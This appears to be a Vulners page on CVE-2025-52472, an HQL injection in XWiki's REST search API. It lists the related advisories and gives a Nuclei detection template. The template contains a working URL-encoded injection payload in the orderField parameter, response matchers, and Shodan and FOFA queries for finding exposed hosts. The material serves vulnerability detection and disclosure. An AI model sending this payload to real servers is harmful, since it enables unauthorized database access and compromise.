| Reporter | Title | Published | Views | Family All 16 |
|---|---|---|---|---|
| The vulnerability of the REST API implementation of the XWiki Platform, a platform for creating collaborative web applications. This vulnerability allows a perpetrator to execute arbitrary code. | 8 Oct 202500:00 | – | bdu_fstec | |
| CVE-2025-52472 | 3 Nov 202504:08 | – | circl | |
| XWiki Platform SQL注入漏洞 | 6 Oct 202500:00 | – | cnnvd | |
| CVE-2025-52472 | 6 Oct 202514:53 | – | cve | |
| CVE-2025-52472 XWiki Platform vulnerable to HQL injection via wiki and space search REST API | 6 Oct 202514:53 | – | cvelist | |
| EUVD-2025-32540 | 6 Oct 202520:16 | – | euvd | |
| XWiki Platform is vulnerable to HQL injection via wiki and space search REST API | 6 Oct 202520:16 | – | github | |
| CVE-2025-52472 | 6 Oct 202515:16 | – | nvd | |
| CVE-2025-52472 XWiki Platform vulnerable to HQL injection via wiki and space search REST API | 6 Oct 202514:53 | – | osv | |
| GHSA-GPRP-H92G-GC2H XWiki Platform is vulnerable to HQL injection via wiki and space search REST API | 6 Oct 202520:16 | – | osv |
id: CVE-2025-52472
info:
name: XWiki - HQL Injection
author: ritikchaddha
severity: high
description: |
XWiki is vulnerable to Hibernate Query Language (HQL) injection in the wiki and space search REST API starting in version 4.3-milestone-1 and prior to versions 16.10.9, 17.4.2, and 17.5.0. The vulnerability allows attackers to inject malicious HQL queries through the orderField parameter, potentially leading to data extraction, authentication bypass, or remote code execution depending on database backend and configuration.
impact: |
Unauthenticated attackers can inject malicious HQL queries through the orderField parameter, potentially leading to complete database compromise, data extraction, authentication bypass, or remote code execution.
remediation: |
Update XWiki to a version that patches this vulnerability. Review and sanitize all user-controlled parameters that are used in database queries, especially those passed to HQL queries.
reference:
- https://jira.xwiki.org/browse/XWIKI-23247
- https://nvd.nist.gov/vuln/detail/CVE-2025-52472
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-52472
epss-score: 0.02207
epss-percentile: 0.8042
cwe-id: CWE-89
cpe: cpe:2.3:a:xwiki:xwiki:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: xwiki
product: xwiki
shodan-query: html:"data-xwiki-reference"
fofa-query: body="data-xwiki-reference"
tags: cve,cve2025,xwiki,hqli,sqli,vkev
http:
- method: GET
path:
- "{{BaseURL}}/xwiki/rest/wikis/xwiki/search?q=test&scope=title&orderField=doc.fullName%20from%20XWikiDocument%20as%20doc%20where%20%24%24%3D%27%24%24%3Dconcat(chr(61)%2Cchr(39))%20and%20version()%7C%7Cpg_sleep(1)%3Dversion()%7C%7Cpg_sleep(1)%20and%20(1%3D1%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F%20or%20%3F%3D%3F)%20--%20comment%27%20or%20a%3D%27%20order%20by%20doc.fullName"
matchers:
- type: dsl
dsl:
- 'contains_all(body, "xwiki", "QueryException: Exception while executing query. Query statement")'
- 'contains(content_type, "text/plain")'
- 'status_code == 500'
condition: and
# digest: 4a0a00473045022033a5b905834d6d4dd91d7fc811ae562aad021825e2fdc404d0f222f616edfd0f022100d81de4b8b08c2e37235e3c1240ef7d0c6a5779bc4a05c5513829fd935898f195:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation